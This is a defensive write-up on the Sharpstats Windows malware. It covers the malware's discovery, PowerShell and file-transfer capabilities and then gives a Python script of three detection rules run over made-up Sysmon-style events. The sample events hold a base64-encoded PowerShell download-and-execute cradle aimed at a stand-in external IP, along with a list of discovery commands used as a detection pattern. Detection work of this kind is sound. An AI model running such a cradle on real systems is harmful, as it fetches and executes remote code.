Sharpstats targets Windows hosts. Its capabilities include fingerprinting the compromised machine (domain, date and time, IP address, machine name and operating system), identifying the current username, and uploading and downloading files. The malware is obfuscated with a combination of base64 encoding and XOR, which hinders static analysis of the sample.
Sharpstats Malware Capabilities:
Sharpstats may gather information about a system's network configuration and settings, such as IP and MAC addresses, and may extend that discovery to other systems it can reach. It may also collect detailed information about the operating system and hardware, including version, patches, hotfixes, service packs and architecture. Additionally, Sharpstats may try to identify the primary user, the currently logged-in user, the set of users that commonly use the system, or whether a user is actively using it. Finally, it may abuse PowerShell commands and scripts for execution, and transfer tools or other files from an external system into the compromised environment.
- Sharpstats may look for details about the network configuration and settings of the systems it accesses, including IP and MAC addresses, and for information about the operating system and hardware, including version, patches, hotfixes, service packs and architecture.
- Sharpstats may attempt to identify the primary user or users of a system and use that information to shape follow-on behaviour, such as deciding whether to fully infect the target. It may also transfer tools or other files from an external system into the compromised environment.
Ways to Mitigate Sharpstats Malware Capabilities
- Sharpstats activity can be detected by monitoring command-line interface usage and system and network discovery techniques. A burst of discovery commands (typically systeminfo, ipconfig, whoami and hostname) spawned by one parent process is a strong signal that the malware is gathering information, and catching it at that stage limits further damage.
- Sharpstats activity can also be detected by monitoring file creation and files transferred into the network. An unusual process that holds an external network connection and then creates files on the system is suspicious, as is the use of transfer utilities, such as ftp, that do not normally occur on that host.
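The capabilities listed above (discovery of network configuration, OS and user; PowerShell execution; ingress tool transfer) and the two monitoring recommendations map onto three concrete detection rules. The Python below is an added example written for this page, not code from the original page or from any vendor product: it runs those rules over constructed Sysmon-style telemetry (process creation, network connection, file creation). The event shape, process names, PIDs, timestamps, the encoded PowerShell payload and the thresholds are all assumptions; the 203.0.113.7 address is a documentation-range stand-in for an external host.

```python
import base64
import ipaddress
import re
import shlex
from collections import defaultdict

# Constructed sample telemetry in a Sysmon-like shape. Names, PIDs, timestamps
# and the payload are made up for the example.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s')"
ENCODED_PAYLOAD = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ts": 100, "type": "process_create", "pid": 500, "ppid": 400, "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    {"ts": 101, "type": "process_create", "pid": 501, "ppid": 500, "image": r"C:\Windows\System32\systeminfo.exe", "cmdline": "systeminfo"},
    {"ts": 102, "type": "process_create", "pid": 502, "ppid": 500, "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"ts": 103, "type": "process_create", "pid": 503, "ppid": 500, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all"},
    {"ts": 104, "type": "process_create", "pid": 504, "ppid": 500, "image": r"C:\Windows\System32\HOSTNAME.EXE", "cmdline": "hostname"},
    {"ts": 110, "type": "network_connect", "pid": 500, "dst_ip": "203.0.113.7", "dst_port": 443},
    {"ts": 112, "type": "file_create", "pid": 500, "path": r"C:\Users\Public\update.exe"},
    # Benign noise: a lone ipconfig from a helpdesk shell and an internal SMB file save.
    {"ts": 200, "type": "process_create", "pid": 600, "ppid": 300, "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /release"},
    {"ts": 205, "type": "network_connect", "pid": 700, "dst_ip": "10.0.0.5", "dst_port": 445},
    {"ts": 206, "type": "file_create", "pid": 700, "path": r"C:\Users\alice\report.docx"},
]

DISCOVERY_COMMANDS = {"systeminfo", "ipconfig", "whoami", "hostname", "net", "nltest", "getmac", "arp", "query", "tasklist"}
DROPPED_EXTENSIONS = (".exe", ".dll", ".ps1", ".bat", ".vbs")
# Explicit internal ranges instead of ipaddress.is_private, which also classifies the
# 203.0.113.0/24 documentation range (our stand-in external address) as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def command_name(cmdline: str) -> str:
    """Base name of the executable in a Windows command line, without quotes or .exe."""
    tokens = shlex.split(cmdline, posix=False)  # non-POSIX: backslashes are not escapes
    if not tokens:
        return ""
    first = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return first[:-4] if first.endswith(".exe") else first


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def decode_encoded_powershell(cmdline: str):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def discovery_bursts(events, window=120, min_distinct=3):
    """Flag a parent that spawns several distinct discovery commands within `window` seconds."""
    by_parent = defaultdict(list)
    for e in events:
        if e["type"] == "process_create" and command_name(e["cmdline"]) in DISCOVERY_COMMANDS:
            by_parent[e["ppid"]].append((e["ts"], command_name(e["cmdline"])))
    alerts = []
    for ppid, hits in by_parent.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):  # sliding window over the sorted hits
            seen = {cmd for ts, cmd in hits[i:] if ts - t0 <= window}
            if len(seen) >= min_distinct:
                alerts.append({"rule": "discovery_burst", "ppid": ppid, "commands": sorted(seen)})
                break
    return alerts


def encoded_powershell(events):
    """Flag PowerShell launched with an encoded command and surface the decoded script."""
    alerts = []
    for e in events:
        if e["type"] == "process_create" and command_name(e["cmdline"]) in {"powershell", "pwsh"}:
            decoded = decode_encoded_powershell(e["cmdline"])
            if decoded is not None:
                alerts.append({"rule": "encoded_powershell", "pid": e["pid"], "decoded": decoded})
    return alerts


def ingress_tool_transfer(events, window=300):
    """Flag a process that talks to an external address and then writes an executable file."""
    external = defaultdict(list)
    for e in events:
        if e["type"] == "network_connect" and is_external(e["dst_ip"]):
            external[e["pid"]].append((e["ts"], e["dst_ip"]))
    alerts = []
    for e in events:
        if e["type"] != "file_create" or not e["path"].lower().endswith(DROPPED_EXTENSIONS):
            continue
        for ts, ip in external.get(e["pid"], []):
            if 0 <= e["ts"] - ts <= window:
                alerts.append({"rule": "ingress_tool_transfer", "pid": e["pid"], "remote": ip, "path": e["path"]})
                break
    return alerts


def run_all(events):
    return {"discovery_burst": discovery_bursts(events),
            "encoded_powershell": encoded_powershell(events),
            "ingress_tool_transfer": ingress_tool_transfer(events)}


if __name__ == "__main__":
    for rule, hits in run_all(SAMPLE_EVENTS).items():
        for hit in hits:
            print(rule, hit)
```

On the sample the benign ipconfig and the internal SMB write produce nothing, while the PowerShell process is flagged three times: for the encoded command (the decoded script shows the download), for the discovery burst its children produce, and for writing an executable shortly after connecting to an external address. The window sizes, the discovery command list and the extension list are starting points to tune per environment; correlating the three hits on one process ID is what turns them from noise into an incident.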